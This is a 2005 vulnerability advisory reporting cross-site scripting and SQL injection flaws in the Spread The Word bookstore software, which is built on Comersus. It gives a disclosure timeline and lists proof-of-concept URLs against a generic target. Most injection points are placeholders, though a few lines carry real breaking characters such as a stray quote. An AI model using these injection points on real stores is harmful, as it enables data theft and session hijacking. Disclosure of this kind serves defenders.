################################################################## Spread The Word (comersus based bookstore ) multiple script and variables XSS and SQL Injections vulnerabilities. vendor url:http://www.stwm.com/opportunity.asp advisore url:http://lostmon.blogspot.com/2005/05/ spread-word-multiple-xss-and-sql.html vendor notified:yes exploit available: yes ################################################################## Spread The Word (comersus based bookstore ) contains a flaw that allows a remote cross site scripting attack.This flaw exists because the application does not validate multiple variables upon submission to multiple scripts.This could allow a user to create a specially crafted URL that would execute arbitrary code in a user's browser within the trust relationship between the browser and the server, leading to a loss of integrity. ############## versions: ############## I canīt established what version are affected. ############## solution: ############## no solution was available at this time. ############## timeline ############## discovered: 17 oct 2004 vendor notify: 08 april 2005 vendor response: 11 april 2005 disclosure: 24 may 2005 #################### proof of concepts: #################### Some files have different prefix like STW ej: 'ShowContent.asp' in others stores are 'STWShowContent.asp' ##################### BrowseCategories.asp ##################### XSS,sql errors and path disclosure. http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible[XSS-here] http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[XSS-here]&Cat1Literal=Bible http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts[XSS-here]&Cat1=839&Cat1Literal=Bible http://[target]/store/BrowseCategories.asp?Cat0=783[XSS-here]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible http://[target]/store/BrowseCategories.asp?Cat0=783[SQL-INJECTION]&Cat0Literal=Gifts&Cat1=839&Cat1Literal=Bible http://[target]/store/BrowseCategories.asp?Cat0=783&Cat0Literal=Gifts&Cat1=839[SQL-INJECTION]&Cat1Literal=Bible Cat0literal can be books, videos,gifts,bibles,or other categories similar listed in the cart. ############# search.asp ############# XSS,sql errors and path disclosure. http://[target]/store/Search.asp?SearchType=565[SQL-INJECTION]&strSearch=lalala http://[target]/store/Search.asp?InStock=[XSS-here]&SearchType=783&strSearch=i&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1 http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=[XSS-here]&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1 http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1[XSS-here]&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=-1 http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1[XSS-here]&PriceMin=&PriceMax=&PublicationDate=-1 http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=[XSS-here]&PriceMax=&PublicationDate=-1 http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=lol&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=[XSS-here]&PublicationDate=-1 http://[target]/store/Search.asp?InStock=&SearchType=783&strSearch=1&SearchCat1=-1&SearchCat2=-1&PriceMin=&PriceMax=&PublicationDate=' ################## AdvancedSearch.asp ################## http://[target]/store/AdvancedSearch.asp?strSearch=[XSS-CODE]&SearchType=-1&SearchCat1=-1&SearchCat2=-1&Author=dd&PublicationDate=-1&PriceMin=1&PriceMax=111111111&B1=Submit ################## ViewItem.asp ################## XSS,sql errors and path disclosure. http://[target]/store/ViewItem.asp?ISBN=0789906651[XSS-here]&Cat0=565 http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[XSS-here] http://[target]/store/ViewItem.asp?ISBN=0789906651[SQL-INJECTION]&Cat0=565 http://[target]/store/ViewItem.asp?ISBN=0789906651&Cat0=565[SQL-INJECTION] #################### STWShowContent.asp ################### XSS ,sql errors and path disclosure. http://[target]/store/STWShowContent.asp?idRightPage=13032[XSS-CODE] http://[target]/store/STWShowContent.asp?idRightPage=13032[SQL-INJECTION] http://[target]/store/STWShowContent.asp ################### MySide.Asp ################### XSS,sql errors and path disclosure. http://[target]/store/MySide.Asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE] http://[target]/store/MySide.Asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles ################# BrowseMain.asp ################# XSS ,sql errors and path disclosure. http://[target]/store/BrowseMain.asp?Cat0=565[XSS-CODE]&Cat0Literal=Bibles&CurHigh=4 http://[target]/store/BrowseMain.asp?Cat0=565&Cat0Literal=Bibles[XSS-CODE]&CurHigh=4 http://[target]/store/BrowseMain.asp?Cat0=565[SQL-INJECTION]&Cat0Literal=Bibles&CurHigh=4 http://[target]/store/BrowseMain.asp?Cat0=783&Cat0Literal=Gifts&CurHigh=3"> ################ others ################ XSS http://[target]/store/NewCustomer.asp?newemail=zzzz@lalala.es&RedirectURL=[XSS-CODE] http://[target]/store/Login.asp?RedirectURL=[XSS-code] Also itīs posible to we can inject sql or XSS code in 'Cat0' variable or 'Cat1' in all files where this variables are used. Also itīs posible to we can inject XSS code in 'Cat0literal' variable or 'Cat1literal' in all files where this variables are used. ######################### End ######################## thnx to estrella to be my ligth Thnx to icaro he is my Shadow !!! thnx to all http://www.osvdb.org Team thnx to all who day after day support me !!! -- atentamente: Lostmon (lostmon@gmail.com) Web-Blog: http://lostmon.blogspot.com/ Data Mangler of: http://www.osvdb.org -- La curiosidad es lo que hace mover la mente